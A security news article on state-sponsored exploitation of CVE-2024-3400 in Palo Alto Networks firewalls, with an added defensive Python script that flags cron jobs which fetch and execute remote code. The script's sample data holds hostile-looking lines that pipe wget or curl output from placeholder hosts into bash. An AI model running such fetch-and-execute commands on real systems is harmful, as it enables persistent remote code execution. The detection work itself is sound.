
State-Sponsored Hackers Exploit Zero-Day to Backdoor Palo Alto Networks Firewalls

A state-sponsored threat actor has been exploiting a zero-day in Palo Alto Networks firewalls for the past two weeks.


A threat actor has successfully exploited a zero-day in Palo Alto Networks firewalls for more than two weeks, malware hunters at Volexity warn.

Palo Alto Networks disclosed the vulnerability on Friday, warning that it was aware of limited in-the-wild exploitation and promising patches within the next two days.

Tracked as CVE-2024-3400 (CVSS score of 10/10), the security defect is described as a command injection issue that allows unauthenticated attackers to execute arbitrary code with root privileges on impacted firewalls.

According to the vendor, all appliances running PAN-OS versions 10.2, 11.0, and 11.1 that have GlobalProtect gateway and device telemetry enabled are vulnerable. Other PAN-OS versions, cloud firewalls, Panorama appliances, and Prisma Access are not affected.

“Palo Alto Networks is aware of malicious exploitation of this issue. We are tracking the initial exploitation of this vulnerability under the name Operation MidnightEclipse, as we assess with high confidence that known exploitation we’ve analyzed thus far is limited to a single threat actor,” the company says in a blog post.

Volexity has attributed the CVE-2024-3400 exploitation to a state-sponsored threat actor it tracks as ‘UTA0218’, which appears to be highly capable “with a clear playbook of what to access to further their objectives”.

“Volexity assesses that it is highly likely UTA0218 is a state-backed threat actor based on the resources required to develop and exploit a vulnerability of this nature, the type of victims targeted by this actor, and the capabilities displayed to install the Python backdoor and further access victim networks,” the cybersecurity firm notes.

The company is currently unable to link the activity to previously known threat actors or operations. 


It is unclear how widespread the exploitation might have been, but Volexity says it has “evidence of potential reconnaissance activity involving more widespread exploitation aimed at identifying vulnerable systems”.

Since March 26, the cybersecurity firm says, UTA0218 has been successfully exploiting the zero-day against multiple organizations. In two instances, the attackers also injected a Python-based backdoor called Upstyle and used it to execute additional commands.

“After successfully exploiting devices, UTA0218 downloaded additional tooling from remote servers they controlled in order to facilitate access to victims’ internal networks. They quickly moved laterally through victims’ networks, extracting sensitive credentials and other files that would enable access during and potentially after the intrusion,” Volexity explains.

The threat actor was seen creating a cron job on the firewall to persistently fetch a file from a remote server and execute its contents. The attackers were seen manually managing an access control list for the command-and-control (C&C) server, to ensure that it can only be accessed from the device communicating with it.
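For defenders reviewing crontab contents collected from a device, the following added example (not code from Volexity, Palo Alto Networks, or this article) flags cron entries that fetch remote content and hand it to an interpreter, the persistence pattern described above. The sample entries, hosts, rule names and function names are constructed for illustration, and the patterns are heuristics rather than vendor-published indicators.

```python
import re

INTERP = r"(?:(?:ba|da|z|k)?sh|python[\d.]*|perl)"
FETCH = r"(?:wget|curl)"
# Heuristic rules, checked in order; each targets one fetch-and-execute shape.
RULES = [
    ("pipe-to-interpreter", re.compile(rf"\b{FETCH}\b[^|;]*\|\s*{INTERP}\b")),
    ("command-substitution", re.compile(rf"\b{INTERP}\b[^|;]*(?:\$\(|`)\s*{FETCH}\b")),
    ("download-then-run", re.compile(rf"\b{FETCH}\b.*(?:;|&&)\s*{INTERP}\b")),
]
URL = re.compile(r"(?:https?|ftp)://[^\s'\"|;)`]+")

def command_of(line, system=False):
    """Return the command field of a crontab line, or None if it is not a job."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"[A-Za-z_]\w*\s*=", line):
        return None  # blank, comment, or environment assignment
    # "@reboot"-style nicknames replace the five schedule fields;
    # system crontabs (/etc/crontab, /etc/cron.d) add a user field.
    skip = (1 if line.startswith("@") else 5) + (1 if system else 0)
    parts = line.split(None, skip)
    return parts[skip] if len(parts) > skip else None

def find_fetch_exec_jobs(text, system=False):
    """Return one finding per cron job that matches a fetch-and-execute rule."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        cmd = command_of(raw, system)
        if cmd is None:
            continue
        for reason, rule in RULES:
            if rule.search(cmd):
                findings.append({"line": lineno, "reason": reason,
                                 "urls": URL.findall(cmd), "command": cmd})
                break
    return findings

# Constructed sample in /etc/cron.d format; hosts are documentation placeholders.
SAMPLE = """\
# constructed entries for illustration
MAILTO=root
*/5 * * * * root /usr/local/bin/rotate-logs.sh
* * * * * root wget -qO- http://192.0.2.10/x | bash
@reboot root bash -c "$(curl -s http://example.invalid/u)"
0 3 * * * root curl -s -o /var/tmp/report.json https://example.invalid/report
"""

if __name__ == "__main__":
    for f in find_fetch_exec_jobs(SAMPLE, system=True):
        print(f"line {f['line']}: {f['reason']} {f['urls']}")
```

A download that is only saved to disk (the last sample line) is not flagged, so any URLs extracted from flagged entries are the ones worth checking against egress logs.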

UTA0218 was also observed deploying a reverse shell written in Python and an open source SSH reverse shell, downloading reverse proxy tooling such as GOST (GO Simple Tunnel), and exfiltrating configuration data from the compromised firewalls.

In one attack, the threat actor used a highly privileged service account from the Palo Alto Networks firewall to move laterally via SMB and WinRM. UTA0218 then stole the Active Directory database, key data, Windows event logs, login information, cookies, and browser data, and was able to decrypt stored credentials.

“UTA0218 was not observed deploying malware or additional methods of persistence on systems within victim networks. The stolen data did allow the attacker to effectively compromise credentials for all domain accounts. Further, the attacker gained access and could potentially use valid credentials or cookies taken from browser data for specific user workstations accessed,” Volexity explains.

Patches for CVE-2024-3400 are expected to arrive by April 14. In the meantime, organizations are advised to disable device telemetry on their firewalls, and apply other mitigation recommendations that Palo Alto Networks detailed in its advisory.

Organizations that believe they were compromised via this zero-day are advised to collect logs, create a tech support file, and preserve forensic artifacts. They should also hunt for potential lateral movement and should consider all sensitive data on the firewall to be compromised.

Both Palo Alto Networks and Volexity warn that exploitation of CVE-2024-3400 is likely to spike over the next few days, both by UTA0218 and other threat actors, mainly driven by the imminent availability of patches.
